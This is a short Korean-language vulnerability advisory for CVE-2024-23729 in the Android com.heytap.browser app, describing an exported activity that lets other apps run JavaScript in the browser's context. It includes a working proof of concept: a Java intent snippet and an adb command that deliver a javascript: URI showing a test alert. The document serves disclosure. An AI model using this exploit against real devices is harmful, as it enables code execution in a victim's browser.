
CVE-2024-23729
Android 플랫폼의 com.heytap.browser 애플리케이션에서 취약점이 발견되었습니다. 이 취약점으로 인해 공격자는 별도의 권한 없이 애플리케이션 컨텍스트 내에서 임의의 JavaScript 코드를 실행할 수 있습니다.
com.heytap.browsercom.heytap.browser 앱의 com.android.browser.RealBrowserActivity 활동은 외부에 노출되어 있으며, 어떤 타사 애플리케이션이든 권한 없이 호출할 수 있습니다. 악성 앱은 이를 악용하여 com.heytap.browser 애플리케이션의 컨텍스트 내에서 임의의 JavaScript 코드를 실행할 수 있습니다.
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

성공적인 악용 시 공격자는 다음을 수행할 수 있습니다:
com.heytap.browser 앱의 컨텍스트 내에서 임의의 JavaScript 코드 실행